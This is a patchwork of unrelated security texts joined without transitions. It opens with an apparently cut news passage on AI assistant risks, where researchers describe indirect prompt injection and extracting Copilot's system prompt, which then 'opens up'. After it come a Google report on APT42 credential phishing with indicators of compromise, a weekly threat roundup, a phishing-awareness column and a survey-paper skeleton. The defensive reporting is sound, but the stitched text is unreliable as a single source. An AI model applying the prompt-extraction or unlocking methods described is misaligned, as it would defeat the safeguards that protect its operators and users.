As generative AI systems, such as OpenAI’s ChatGPT, Microsoft’s Copilot, and Google’s Gemini, have developed in the past two years, they’ve moved onto a trajectory where they may eventually be completing tasks for people, like booking meetings or online shopping. However, security researchers have consistently highlighted that allowing external data into AI systems, such as through emails or accessing content from websites, creates security risks through indirect prompt injection and poisoning attacks.

“I think it’s not that well understood how much more effective an attacker can actually become now,” says Johann Rehberger, a security researcher and red team director, who has extensively demonstrated security weaknesses in AI systems. “What we have to be worried [about] now is actually what is the LLM producing and sending out to the user.”

Bargury says Microsoft has put a lot of effort into protecting its Copilot system from prompt injection attacks, but he says he found ways to exploit it by unraveling how the system is built. This included extracting the internal system prompt, he says, and working out how it can access enterprise resources and the techniques it uses to do so. “You talk to Copilot and it’s a limited conversation, because Microsoft has put a lot of controls,” he says. “But once you use a few magic words, it opens up and you can do whatever you want.”

Rehberger broadly warns that some data issues are linked to the long-standing problem of companies allowing too many employees access to files and not properly setting access permissions across their organizations. “Now imagine you put Copilot on top of that problem,” Rehberger says. He says he has used AI systems to search for common passwords, such as Password123, and it has returned results from within companies.

Both Rehberger and Bargury say there needs to be more focus on monitoring what an AI produces and sends out to a user. “The risk is about how AI interacts with your environment, how it interacts with your data, how it performs operations on your behalf,” Bargury says. “You need to figure out what the AI agent does on a user's behalf. And does that make sense with what the user actually asked for.”
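One way to picture the kind of output monitoring Rehberger and Bargury describe is a filter that inspects links in an assistant's reply before it reaches the user. The following is only a minimal sketch under stated assumptions: the `TRUSTED_DOMAINS` allowlist, the function name, and the example hosts are hypothetical, and nothing here reflects how Copilot or any Microsoft control actually works.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist of domains the organization considers safe to link to.
TRUSTED_DOMAINS = {"example.com"}

# Rough URL matcher for plain-text assistant output (an illustrative heuristic).
URL_RE = re.compile(r"https?://[^\s<>()\[\]]+", re.IGNORECASE)


def untrusted_links(assistant_output, trusted=TRUSTED_DOMAINS):
    """Return URLs in the output whose host is not a trusted domain or subdomain."""
    flagged = []
    for raw in URL_RE.findall(assistant_output):
        url = raw.rstrip(".,;:!?")  # drop sentence punctuation stuck to the URL
        host = (urlsplit(url).hostname or "").lower()
        is_trusted = any(host == d or host.endswith("." + d) for d in trusted)
        if not is_trusted:
            flagged.append(url)
    return flagged


reply = (
    "The updated bank details are at https://files.example.com/q3 "
    "and you can confirm them at https://example.com.attacker.test/login."
)
print(untrusted_links(reply))
```

The suffix comparison is deliberate: a host such as `example.com.attacker.test` contains the trusted name but does not end with it, so it is flagged. A real deployment would also need to handle redirects and shortened links, which this sketch ignores.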


Threat Analysis Group

Iranian backed group steps up phishing campaigns against Israel, U.S.

Aug 14, 2024

Today Google’s Threat Analysis Group (TAG) is sharing insights on APT42, an Iranian government-backed threat actor, and their targeted phishing campaigns against Israel and Israeli targets. We are also confirming recent reports around APT42’s targeting of accounts associated with the U.S. presidential election.

Associated with Iran’s Islamic Revolutionary Guard Corps (IRGC), APT42 consistently targets high-profile users in Israel and the U.S., including current and former government officials, political campaigns, diplomats, individuals who work at think tanks, as well as NGOs and academic institutions that contribute to foreign policy conversations. In the past six months, the U.S. and Israel accounted for roughly 60% of APT42’s known geographic targeting, including the likes of former senior Israeli military officials and individuals affiliated with both U.S. presidential campaigns. These activities demonstrate the group’s aggressive, multi-pronged effort to quickly alter its operational focus in support of Iran’s political and military priorities.

a chart showing that over 60% of users targeted by APT42 are in the US and Israel

Between February and late July 2024, APT42 heavily targeted users in Israel and the U.S.

Spikes in APT42 targeting against Israel

a chart showing increases in users targeted

Targeted APT42 credential phishing campaigns focused on Israel between February and late July 2024

In April 2024, APT42 intensified their targeting of users based in Israel. They sought out people with connections to the Israeli military and defense sector, as well as diplomats, academics, and NGOs.

APT42 uses a variety of different tactics as part of their email phishing campaigns — including hosting malware, phishing pages, and malicious redirects. They generally try to abuse services like Google (i.e. Sites, Drive, Gmail, and others), Dropbox, OneDrive and others for these purposes. In the course of our work to disrupt APT42, TAG reset any compromised accounts, sent government-backed attacker warnings to the targeted users, updated detections, disrupted malicious Google Sites pages, and added malicious domains and URLs to the Safe Browsing blocklist — dismantling the group’s infrastructure.

an image showing a blue shield and the warning "Government backed attackers may be trying to steal your password"

Government-backed attacker warning

Google Sites phishing: We took down multiple APT42-created Google Sites pages that masqueraded as a petition from the legitimate Jewish Agency for Israel calling on the Israeli government to enter into mediation to end the conflict. The text of the petition was embedded in image files instead of HTML. The Sites page included an ngrok redirect URL, a free service for developers that APT42 has previously used to redirect users to phishing pages.

a phishing campaign card reading "7 terrible hours - Qatar Offers Mediation"

APT42 Google Sites abuse from an April 2024 phishing campaign

Targeting military, defense, diplomats, academics, and civil society: APT42 attempted to use social engineering to target former senior Israeli military officials and an aerospace executive by sending emails masquerading as a journalist requesting comment on the recent air strikes. They also sent social engineering emails to Israeli diplomats, academics, NGOs and political entities. The emails were sent from accounts hosted by a variety of email service providers, and did not contain malicious content. These emails were likely meant to elicit engagement from the recipients before APT42 attempted to compromise the targets. Google suspended identified Gmail accounts associated with APT42.

A June 2024 campaign targeting Israeli NGOs used a benign PDF email attachment impersonating the legitimate Project Aladdin, which contained a shortened URL link that redirected to a phishing kit landing page designed to harvest Google login credentials.

image of a PDF with the header "Project Aladin"

Benign PDF leading to an APT42 phishing kit landing page

Spoofed Google Drive page

APT42 phishing kit landing page

Targeted credential phishing: APT42’s success in credential phishing is the result of persistence and heavy reliance on social engineering to appear more credible to their targets. They regularly create accounts or domains that impersonate organizations that might be of interest to the target. For example:

APT42 masqueraded as the legitimate Washington Institute for Near East Policy in multiple campaigns since April 2024, targeting Israeli diplomats and journalists, researchers at U.S. think tanks, and others. In these campaigns, attackers set the email display name as a legitimate researcher affiliated with the Washington Institute, but the underlying email address was not from the official .org domain.
APT42 registers typosquat domains very close to the legitimate domains of the organizations they impersonate. For example, APT42 used the domain understandingthewar[.]org to target U.S. military members by impersonating the legitimate Institute for the Study of War. Similarly, APT42 registered brookings[.]email, to spoof the Brookings Institution and used it in multiple campaigns targeting Israel.
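The two impersonation patterns above (a trusted display name over an unrelated address, and a domain that closely resembles a legitimate one) can be checked mechanically. The sketch below is illustrative only: the `OFFICIAL_DOMAINS` mapping is an assumed allowlist that a defender would maintain, the function names and the 0.85 similarity threshold are hypothetical choices, and this is not a description of how Google detects these campaigns.

```python
from difflib import SequenceMatcher
from email.utils import parseaddr

# Assumed allowlist for illustration: display-name keyword -> official domain.
OFFICIAL_DOMAINS = {
    "washington institute": "washingtoninstitute.org",
    "institute for the study of war": "understandingwar.org",
    "brookings": "brookings.edu",
}


def is_official(domain, official):
    """True if domain is the official domain or one of its subdomains."""
    return domain == official or domain.endswith("." + official)


def display_name_mismatch(from_header):
    """Flag a From header whose display name claims an organization
    while the address sits on a domain that organization does not own."""
    display_name, address = parseaddr(from_header)
    domain = address.rpartition("@")[2].lower()
    name = display_name.lower()
    return any(
        keyword in name and not is_official(domain, official)
        for keyword, official in OFFICIAL_DOMAINS.items()
    )


def lookalike_of(domain, threshold=0.85):
    """Return the official domain that `domain` appears to imitate, or None."""
    domain = domain.lower().rstrip(".")
    officials = sorted(set(OFFICIAL_DOMAINS.values()))
    if any(is_official(domain, official) for official in officials):
        return None
    for official in officials:
        brand = official.split(".")[0]
        reuses_brand = brand in domain.split(".")  # same name, different TLD
        similar = SequenceMatcher(None, domain, official).ratio() >= threshold
        if reuses_brand or similar:
            return official
    return None


print(lookalike_of("understandingthewar.org"))
print(lookalike_of("brookings.email"))
print(display_name_mismatch("Washington Institute Fellow <fellow@mail.example.net>"))
```

String similarity alone misses a case like `brookings[.]email`, where the brand label is reused unchanged under a different top-level domain, which is why the sketch also compares domain labels directly.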

Targeting individuals related to the U.S. presidential election

For many years, Google has worked to identify and disrupt malicious activity in the context of democratic elections. During the 2020 U.S. presidential election cycle, we disrupted APT42 attempts to target accounts associated with the Biden and Trump presidential campaigns.

In the current U.S. presidential election cycle, TAG detected and disrupted a small but steady cadence of APT42’s Cluster C credential phishing activity. In May and June, APT42 targets included the personal email accounts of roughly a dozen individuals affiliated with President Biden and with former President Trump, including current and former officials in the U.S. government and individuals associated with the respective campaigns. We blocked numerous APT42 attempts to log in to the personal email accounts of targeted individuals.

Recent public reporting shows that APT42 has successfully breached accounts across multiple email providers. We observed that the group successfully gained access to the personal Gmail account of a high-profile political consultant. In addition to our standard actions of quickly securing any compromised account and sending government-backed attacker warnings to the targeted accounts, we proactively referred this malicious activity to law enforcement in early July and we are continuing to cooperate with them.

At the same time, we also informed campaign officials that Google was seeing heightened malicious activity originating from foreign state actors and underscored the importance of enhanced account security protections on personal email accounts.

Today, TAG continues to observe unsuccessful attempts from APT42 to compromise the personal accounts of individuals affiliated with President Biden, Vice President Harris and former President Trump, including current and former government officials and individuals associated with the campaigns.

Understanding APT42’s tailored credential phishing

In phishing campaigns that TAG has disrupted, APT42 often uses tactics like sending phishing links either directly in the body of the email or as a link in an otherwise benign PDF attachment. In such cases, APT42 would engage their target with a social engineering lure to set-up a video meeting and then link to a landing page where the target was prompted to login and sent to a phishing page. One campaign involved a phishing lure featuring an attacker-controlled Google Sites link that would direct the target to a fake Google Meet landing page. Other lures included OneDrive, Dropbox and Skype. Over the last six months, we have systematically disrupted these attackers’ ability to abuse Google Sites in more than 50 similar campaigns.

Another APT42 campaign template is sending legitimate PDF attachments as part of a social engineering lure to build trust and encourage the target to engage on other platforms like Signal, Telegram or WhatsApp. We expect the attackers would then use these platforms to send a phishing kit to harvest credentials.

APT42 has a number of phishing kits that target a variety of sign-on pages including:

GCollection/LCollection/YCollection: a sophisticated credential harvesting tool observed by TAG, capable of gathering credentials from Google, Hotmail and Yahoo users respectively. This kit has seen consistent development since it was first observed in use by APT42 in January 2023. The current version implements a seamless flow that supports multi-factor authentication, device PINs and one-time recovery codes in all 3 platforms. A set of landing page URLs are included with the indicators of compromise.
DWP: a browser-in-the-browser phishing kit often delivered via URL shortener that is less full featured than GCollection.

This spear phishing is supported by reconnaissance, using open-source marketing and social media research tools to identify personal email addresses that might not have default multi-factor authentication or other protection measures that are commonly seen on corporate accounts.

APT42 has also developed a strong understanding of the email providers they target, often researching the security settings of accounts they’re targeting using failed login or recovery workflows to determine the configured second factor for authentication to better target their initial phishing attempts. For example, in some cases they have identified that an account is configured to use Device Prompts as an accepted second factor and added support for them in their GCollection phishing kit. APT42 then combines this approach with knowledge of the target's current geographic location based on either public research or social engineering. As a result, APT42 login and recovery attempts often originate from the correct geographic location with the correct credentials and correct second factor for user authentication.

Once APT42 gains access to an account, they often add additional mechanisms of access including changing recovery email addresses and making use of features that allow applications that do not support multi-factor authentication like application specific passwords in Gmail and third-party app passwords in Yahoo. Google’s Advanced Protection Program revokes and disables these application specific passwords in Gmail, protecting users from this tactic.

Google Threat Intelligence Group, inclusive of TAG and Mandiant, helps identify, monitor and tackle threats, ranging from coordinated influence operations to cyber espionage campaigns against high-risk entities. TAG tracks and works to disrupt more than 270 government-backed attacker groups from more than 50 countries, and we regularly publish our findings to keep the public informed of these threats.

As we outlined above, APT42 is a sophisticated, persistent threat actor and they show no signs of stopping their attempts to target users and deploy novel tactics. This spring and summer, they have shown the ability to run numerous simultaneous phishing campaigns, particularly focused on Israel and the U.S. As hostilities between Iran and Israel intensify, we can expect to see increased campaigns there from APT42.

We also remain vigilant for targeting around the U.S. election and encourage all high-risk individuals including elected officials, candidates, campaign workers, journalists, election workers, government officials, and others to sign up for Google’s Advanced Protection Program. APP is a free, opt-in program designed to protect targeted users against such tactics, preventing unauthorized users from signing into an account even if they know the password.

Indicators of Compromise

APT42 Domains and URLs

DWP Phishing Kit related

accredit-navigation[.]online

hXXps://n9[.]cl/4xgro

GCollection Phishing Kit related

panel-short-check[.]live

check-pabnel-status[.]live

meetroomonlin1925.w3spaces[.]com

smaaaal[.]cfd

click-choose-figured[.]cfd

short-ion-per[.]live

checking-paneling[.]live

hXXps://panel-short-check[.]live/PhyfkFQX

hXXps://check-pabnel-status[.]live/Gcollection/Ref/CkliPwaM

hXXps://check-pabnel-status[.]live/Gcollection/Password

hXXps://panel-short-check[.]live/ZZqt3LYD

hXXps://check-pabnel-status[.]live/Lcollection/Ref/F53OQQkE

hXXps://check-pabnel-status[.]live/Lcollection/Password

hXXps://meetroomonlin1925.w3spaces[.]com/

hXXps://smaaaal[.]cfd/Wp59tqKU

hXXps://click-choose-figured[.]cfd/Gallery/Ref/FSaEM5gG

hXXps://click-choose-figured[.]cfd/Gallery/Password

hXXps://short-ion-per[.]live/08EFNZ1

hXXps://checking-paneling[.]live/aliasauthG/Password

hXXps://checking-paneling[.]live/aliasauthG/autoref/vNSX6c2m

understandingthewar[.]org

brookings[.]email

sharedrive.webredirect[.]org

visioneditor.loseyourip[.]com

s3api[.]shop

hXXps://sharedrive.webredirect[.]org/Khn/shoaGzA/cGNt/dMPaV/kvvhK

hXXps://firebasestorage.googleapis[.]com/v0/b/share-box-5f395.appspot.com/o/onedrive-qrty45.html

hXXps://visioneditor.loseyourip[.]com

hXXps://s3api[.]shop/api/

APT42 Samples (SHA256)

c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32 (NEWSTERMINAL)

bc2597ce09987022ff0498c6710a9b51a1a47ed8082ac044be2838b384157527 (OFFICEFUEL)

baac058ddfc96c8aea8c0057077505f0ad3ff20311d999886fed549924404849 (OFFICEFUEL)

0180f4f29c550aa1ffaa21af51711b29de99fb1d7c932d008a0e9356ae8a7d60 (FUELDUMP)

f83e2b3be2e6db20806a4b9b216edc7508fa81ce60bf59436d53d3ae435b6060 (FUELDUMP)

82ae2eb470a5a16ca39ec84b387294eaa3ae82e5ada4b252470c1281e1f31c0a (FUELDUMP)

89c1d1b61d7f863f8a651726e29f2ae3de7958f36b49a756069021817947d06c (FUELDUMP)

c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3 (GORBLE PS - LNK)

33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156 (GORBLE PS - Stage 1)

4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f (GORBLE PS - Stage 2)

APT42 - IP Addresses

49.13.194[.]118 (C2 - OFFICEFUEL/FUELDUMP)

91.107.150[.]184 (C2 - OFFICEFUEL/FUELDUMP)
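The indicators above are published in defanged form (`hXXps`, `[.]`) so that they cannot be clicked or resolved by accident. Before loading them into a blocklist or detection rule they usually need to be restored and sorted by type. The following is a rough sketch of that step; the function names and the four type labels are assumptions made for illustration, and refanged values should only ever be written to security tooling, never opened.

```python
import re
from ipaddress import ip_address

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def refang(text):
    """Undo the defanging conventions used in the list: hXXp(s) and [.]."""
    text = re.sub(r"^hxxp", "http", text.strip(), flags=re.IGNORECASE)
    return text.replace("[.]", ".")


def classify(line):
    """Return (kind, value) for one indicator line, or None for a blank line.

    Trailing annotations such as "(FUELDUMP)" are ignored by keeping only
    the first whitespace-separated token.
    """
    tokens = line.split()
    if not tokens:
        return None
    value = refang(tokens[0])
    if SHA256_RE.match(value.lower()):
        return ("sha256", value.lower())
    if value.lower().startswith(("http://", "https://")):
        return ("url", value)
    try:
        ip_address(value)
        return ("ip", value)
    except ValueError:
        return ("domain", value.lower())


for sample in [
    "hXXps://n9[.]cl/4xgro",
    "brookings[.]email",
    "49.13.194[.]118 (C2 - OFFICEFUEL/FUELDUMP)",
]:
    print(classify(sample))
```

Section headings in the list (for example "DWP Phishing Kit related") would be classified as domains by this sketch, so a real loader should skip them or validate domain syntax first.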

12th August – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 12th August, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

The financial data systems of the Grand Palais, which hosts Olympic events in France, were targeted by an undisclosed ransomware group. The attack also affected the financial systems of around 40 other French museums, including the Louvre. It did not affect the museum’s operations or the core Olympic systems.
The city of Killeen, Texas, was hit by a ransomware attack that disrupted essential services and exposed sensitive data. The attack was attributed to the BlackSuit ransomware group, a rebrand of a gang responsible for shutting down Dallas last year.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Wins.BlackSuite, Ransomware.Wins.BlackSuit, Ransomware_Linux_BlackSuit)

The Sumter County Sheriff’s Office confirmed it had suffered a ransomware attack. The Rhysida ransomware group claimed responsibility for the attack and allegedly exfiltrated data including passports and Social Security numbers, among other confidential data and documents.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Rhysida; Ransomware.Wins.Rhysida)

Michigan non-profit hospital network McLaren was hit with a ransomware attack. The attack, attributed to the INC Ransom group, disrupted the IT and phone systems of 13 hospitals in the network.
911 emergency services were disrupted in Central Texas for a day due to a DDoS attack. Threat actors used a large volume of fake robocalls (automated phone calls), which crashed the 911 emergency phone lines, degrading call quality or blocking emergency calls from going through at all.
Classroom management platform Mobile Guardian announced that it had been affected by a cybersecurity breach. The attack allowed an attacker to unenroll and wipe more than 13,000 iPad and Chromebook devices. Mobile Guardian has suspended its service due to the attack.
A massive data breach of a scraping service operated by background check company National Public Data (AKA Jerico Pictures) has exposed the personal information of approximately 2.9 billion people. The stolen database was initially listed for sale by the USDoD threat actor for $3.5 million and was later partially leaked for free on the notorious BreachForums. It contains sensitive data such as names, addresses, dates of birth, and Social Security numbers.
SOCRadar reportedly suffered a data breach due to a vulnerable configuration flow that allowed cybercriminals to scrape a database of 322 million emails from the cybersecurity firm. USDoD, the threat actor who claimed to have scraped the data, alleged that it was compiled by SOCRadar from previous breaches and leaks. The claim has not yet been confirmed.

VULNERABILITIES AND PATCHES

Microsoft reported 4 vulnerabilities discovered in OpenVPN, a popular open-source project which is integrated into many IP devices worldwide. The flaws (CVE-2024-27459, CVE-2024-24974, CVE-2024-27903, CVE-2024-1305) could allow attackers to gain local privilege escalation as well as remote code execution. OpenVPN has patched the vulnerabilities in its 2.6.10 version release.
Google has patched a high-severity zero-day vulnerability (CVE-2024-36971) affecting Android devices. The Linux kernel flaw, seen actively exploited in the wild, allows attackers to remotely execute code on affected devices.
Akamai researchers discovered vulnerabilities in Ivanti Connect Secure and FortiGate VPNs. The flaws (CVE-2024-37374, CVE-2024-37375) can allow a user initial access to and control over a compromised VPN server. Attackers can use this to manipulate VPN functionalities or intercept sensitive information like external authentication credentials. At the time the report was published, Ivanti had yet to release a patch, and Fortinet had decided not to fix the custom encryption key bypass.
Cisco has released an advisory for critical vulnerabilities affecting the Web UI for its SPA300 and SPA500 IP Phones. The flaws (CVE-2024-20450, CVE-2024-20454) allow attackers to execute arbitrary commands and to cause a denial-of-service condition. Cisco has announced that it does not plan to fix the vulnerabilities because the products have entered end-of-life.

THREAT INTELLIGENCE REPORTS

Researchers warn of a large, ongoing Magniber ransomware campaign. The threat actors target home users rather than firms and appear to use trojanized software crack downloaders as an initial attack vector. The ransomware encrypts files on the device and appends a random 5-9 character extension, like .oaxysw or .oymtk, to encrypted file names. The ransom note demands $1,000-$5,000 from each victim.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Wins.Magniber)
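The file-renaming behavior described for Magniber (a random 5-9 character extension appended to encrypted files) suggests a simple triage heuristic for a file listing. The sketch below is an illustration built on assumptions that go beyond the report: that the appended extension consists of lowercase letters, as in the two examples given, and that many files on one machine end up with the same extension. The `KNOWN_LONG_EXTENSIONS` allowlist and the `min_count` threshold are hypothetical.

```python
import re
from collections import Counter
from pathlib import PurePath

# 5-9 lowercase letters, matching the shape of examples such as .oaxysw and .oymtk.
RANDOM_SUFFIX_RE = re.compile(r"^\.[a-z]{5,9}$")

# Hypothetical allowlist of legitimate extensions that have the same shape.
KNOWN_LONG_EXTENSIONS = {".xhtml", ".sqlite", ".backup", ".config", ".class", ".blend"}


def suspicious_suffixes(paths, min_count=3):
    """Count unfamiliar 5-9 letter extensions that recur across many files."""
    counts = Counter(
        suffix
        for suffix in (PurePath(p).suffix for p in paths)
        if RANDOM_SUFFIX_RE.match(suffix) and suffix not in KNOWN_LONG_EXTENSIONS
    )
    return {suffix: n for suffix, n in counts.items() if n >= min_count}


listing = [
    "report.docx.oaxysw",
    "photo.jpg.oaxysw",
    "notes.txt.oaxysw",
    "index.xhtml",
    "script.py",
]
print(suspicious_suffixes(listing))
```

A heuristic like this produces false positives on unusual but legitimate file types, so it is better suited to prioritizing hosts for review than to automated response.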

Researchers have identified a new attack vector that exploits the Windows Update process to downgrade software versions, allowing attackers to reintroduce vulnerabilities that have been patched. The downgrading process bypasses all verification steps, including integrity verification and Trusted Installer enforcement. The downgraded OS reports itself as fully updated and is unable to install future updates, leaving the system vulnerable to attack.
The Chameleon Device-Takeover Trojan has resurfaced in new campaigns targeting Canada and Europe. The malware, affecting Android devices, now masquerades as a Customer Relationship Management (CRM) app. This campaign was seen targeting hospitality employees, particularly within a Canadian restaurant chain operating internationally. Once installed, Chameleon collects credentials via keylogging and fake login pages, posing significant risks to business banking accounts.

Check Point Harmony Mobile provides protection against this threat

Five Offbeat Phishing Schemes To Know: New Twists On Classic Scams

Stu Sjouwerman is the founder and CEO of KnowBe4 Inc., a security awareness training and simulated phishing platform.

Nearly every security incident begins with some kind of social engineering or phishing attack. What’s even more worrisome is that phishing volume itself is growing year over year. Adversaries are perpetually updating their tactics to avoid detection. Below are five interesting phishing scams that recently made headlines for their offbeat character.

1. State-Sponsored Cybercriminals Target Prominent Businesspeople

In the first half of the year, MenloLabs uncovered three novel phishing campaigns that were specifically designed to target high-value individuals such as C-level executives at financial services firms, legal firms, government agencies and leading healthcare providers. About 40,000 individuals are believed to have been compromised by these phishing attacks.

The campaigns combined sophisticated Microsoft impersonation with evasive tactics, including dynamic phishing sites, custom HTTP headers, tracking cookies, bot detection countermeasures, encrypted code, server-side generated phishing pages and adversary-in-the-middle (AiTM) techniques capable of bypassing multifactor authentication.

2. Rise Of Phishing Attacks Targeting Weight-Loss Patients

The market for anti-obesity drugs has been rising exponentially. Scammers are swift to capitalize on these trends.


In the first four months of 2024, McAfee’s Threat Research team noted a 183% rise in malicious phishing attempts centered around popular weight-management drugs like Ozempic, Wegovy and Semaglutide. Researchers discovered a total of 449 scam websites and 176,871 phishing attempts where scammers targeted individuals looking to purchase these drugs online. Some scammers offered these drugs at a steep discount. Others posed as doctors located outside the U.S., offering these drugs without a prescription.

3. Phishing Emails Trick Users Into Running Control Paste Command

In an interesting new tactic, threat researchers at Ahnlab encountered a case where threat actors send a phishing email to prompt victims to open an HTML attachment.

When the victim opens it, a dialog box disguised as an MS Word error message appears, asking the recipient to click the “how to fix” link to view the document online. After clicking the link, the victim is prompted to press [Win+R] -> [Ctrl + V] -> [Enter]. In other words, the user is asked to open the Windows Run dialog, paste a PowerShell command and then run it. When a victim follows these steps, malware code is downloaded.
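As a rough illustration of how a mail filter or awareness tool might flag this kind of lure, the sketch below checks whether a piece of text instructs the reader to press both the Run-dialog shortcut and the paste shortcut. The function name and the regular expressions are hypothetical and chosen for illustration only; they are not taken from the Ahnlab report and would need tuning before real use.

```python
import re

# Key sequences taken from the lure described above. The patterns are an
# illustrative assumption, not a vendor detection rule.
RUN_DIALOG = re.compile(r"win(?:dows)?\s*\+\s*r\b", re.IGNORECASE)
PASTE = re.compile(r"ctrl\s*\+\s*v\b", re.IGNORECASE)


def looks_like_paste_and_run(text: str) -> bool:
    """Return True when text asks the reader to open Run and paste a command."""
    return bool(RUN_DIALOG.search(text)) and bool(PASTE.search(text))


lure = "To fix the error press [Win+R] -> [Ctrl + V] -> [Enter]"
print(looks_like_paste_and_run(lure))
```

Requiring both shortcuts keeps ordinary help text that mentions only pasting from being flagged, at the cost of missing lures that phrase the steps differently.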

4. Hacked Customer Portal Delivers Phishing Emails

Hackers are known to use phishing botnets to deliver mass phishing emails. Phishing botnets are basically a network of infected computers hijacked by threat actors and used to send phishing emails. Since these emails are sent from a legitimate source, there is a higher probability that victims will open or click on associated attachments.

On similar lines, attackers have begun hijacking customer portals to deliver phishing emails because these portals are trusted by users. The helpdesk portal of Canadian router manufacturer Mercku was hacked. Adversaries then updated the tool to send phishing emails in response to every new customer support ticket. In addition, attackers abused the user info part of the URL to make the phishing links appear more credible.

Again, this tactic isn’t new; hackers are known to use common file extensions or add random text to shortened links so that they appear more genuine and evade detection.
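The user info trick works because everything before the `@` in a URL's authority section is treated as credentials, not as the destination. A minimal sketch using Python's standard `urllib.parse` shows the difference; the link and the helper name `describe_link` are made up for illustration and do not come from the Mercku incident.

```python
from urllib.parse import urlsplit


def describe_link(url: str) -> dict:
    """Split a URL and report the host a browser would actually contact."""
    parts = urlsplit(url)
    return {
        "userinfo": parts.username,  # text before '@', never the destination
        "host": parts.hostname,      # the real destination host
        "has_userinfo": parts.username is not None,
    }


# Hypothetical link: the trusted-looking name sits in the user info field.
info = describe_link("https://support.example.com@attacker.example/ticket?id=1")
print(info)
```

A filter could treat any link where `has_userinfo` is true as suspicious, since legitimate web links rarely carry credentials in the URL.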

5. Phishing Attack Exploits Windows Search Functionality

The research wing of Trustwave, SpiderLabs , recently detected a new kind of phishing scam that leverages the Windows Search functionality to deploy malware.

Here is how this works: Threat actors send phishing emails containing malicious attachments to victims. The attachment is basically an HTML file that is wrapped in a ZIP archive to avoid detection. Once a victim unzips and opens the attachment, the HTML file abuses standard web protocols to exploit Windows system functionalities. First, the browser prompts the user to allow the search action, and if access is granted, the attacker is able to open Windows Explorer directly and perform a search based on the parameters specified by the threat actor.
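One way to screen such attachments is to look for search-protocol links inside the HTML before it reaches the user. The sketch below assumes the attachment calls Windows Search through the `search-ms:` or `search:` URI schemes; the article does not name the exact protocol, so treat the pattern, the function name and the sample markup as illustrative assumptions.

```python
import re

# Assumption: the HTML triggers Windows Search through the `search-ms:` or
# `search:` URI schemes. The article itself does not name the protocol.
SEARCH_URI = re.compile(r"\bsearch(?:-ms)?:[^\"'\s<>]+", re.IGNORECASE)


def find_search_uris(html: str) -> list[str]:
    """Return every search-protocol URI embedded in an HTML document."""
    return SEARCH_URI.findall(html)


# Hypothetical attachment content that redirects to a remote search.
sample_html = (
    r'<meta http-equiv="refresh" '
    r'content="0; url=search-ms:query=invoice&crumb=location:\\attacker.example\share">'
)
uris = find_search_uris(sample_html)
print(uris)
```

Any hit in an emailed HTML file is worth a closer look, because ordinary web pages have little reason to open a local search window.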

This attack is a great example of the level of understanding attackers have of system vulnerabilities and user behavior.

How Can Organizations Mitigate These Phishing Threats?

These best practices can help organizations mitigate phishing threats to a great extent.

• Train Your Users: Subject users to simulated phishing exercises regularly so that they form a habit of detecting and reporting fraudulent messages. Teach security best practices, such as thinking before you click, avoiding opening attachments from untrusted or unknown sources, watching out for phishing red flags , using a password manager and enabling multifactor authentication (MFA).

• Upgrade To Phishing-Resistant MFA: MFA adds an extra layer of security that can keep hackers out even if user credentials are stolen. However, avoid ordinary MFA tools, as these are themselves prone to phishing attacks. Instead, use phishing-resistant MFA solutions that incorporate factors such as biometrics, PIN codes and smart cards for authentication.

• Update Systems, Software And Tools: Always keep systems and devices updated with the latest firmware to prevent threat actors from exploiting vulnerabilities and potentially hijacking them for phishing or hacking purposes.

By closely monitoring phishing trends, one can see these tactics are essentially old wine in new bottles. The fundamental nature of phishing—replicating authentic communications to deceive individuals into taking action—remains unchanged.

Therefore, if employees are educated to exercise greater vigilance and confront content with skepticism, many of these fraudulent schemes and cyberattacks could be thwarted and identified promptly, mitigating any potential spread of harm to organizations.


A comprehensive survey of AI-enabled phishing attacks detection techniques

Published: 23 October 2020
Volume 76 , pages 139–154, ( 2021 )


Abdul Basit 1 ,
Maham Zafar 1 ,
Xuan Liu ORCID: orcid.org/0000-0002-7966-4488 2 ,
Abdul Rehman Javed 3 ,
Zunera Jalil 3 &
Kashif Kifayat 3


1 Introduction

Phishing attack diagram [ 26 ]

Phishing report for third quarter of the year 2019 [ 1 ]

Most targeted industry sectors—3rd quarter 2019 [ 3 ]

Taxonomy of this survey focusing on phishing attack detection studies

In view of the above limitations, this article makes the following contributions:

• Provide a comprehensive and easy-to-follow survey focusing on deep learning, machine learning, hybrid learning, and scenario-based techniques for phishing attack detection.

• Provide an extensive discussion of various phishing attack techniques and a comparison of the results reported by various studies.

• Provide an overview of current practices, challenges, and future research directions for phishing attack detection.

2 Literature survey

Deep learning for phishing attack detection

Machine learning for phishing attack detection

Scenario-based phishing attack detection

Hybrid learning based Phishing attack detection

2.1 Deep learning (DL) for phishing attack detection

2.2 Machine learning (ML) for phishing attack detection

Table 1 presents a summary of ML approaches for phishing website detection. The table shows that some studies report highly accurate results for phishing attack detection.

2.3 Scenario-based phishing attack detection

In this section, we provide a comparison of the scenario-based phishing attack detection techniques used by various researchers. The comparison is shown in Table 2 . The studies show that different scenarios were handled with different methods and produced different outcomes.

Table 3 provides a comparison of RF classifiers with different datasets and different approaches. Some studies reduced the number of features without much impact on accuracy, while the remaining studies focused on accuracy. Subasi et al. [ 57 ] used different classifiers to detect phishing attacks and achieved an accuracy of 97.36% with the RF algorithm.

2.4 Hybrid learning (HL) based phishing attack detection

In this section, we present a comparison of the HL models used by state-of-the-art studies, as shown in Tables 4 and 5. The studies show how accuracy improved with ensemble and HL techniques.

3 Discussion

4 Current practices and future challenges

5 Conclusion

Abbreviations

Support vector machine

Random forest

Instance-based learner

Artificial neural network

Rotation forest

Decision forest

Enhanced dynamic rule induction

Linear regression

Classification and regression tree

Extreme gradient boost

Gradient boosting decision tree

Neural-networks

Gradient boosting machine

Generalized linear model

Naive Bayes

K-nearest neighbor

Combination extreme learning machine

Extreme learning machine

Random committee

Principal component analysis

(2016). APWG trend report. http://docs.apwg.org/reports/apwg_trends_report_q4_2016.pdf. Accessed 20 July 2020

(2018). Phishing activity trends report. http://docs.apwg.org/reports/apwg_trends_report_q2_2018.pdf. Accessed 20 July 2020

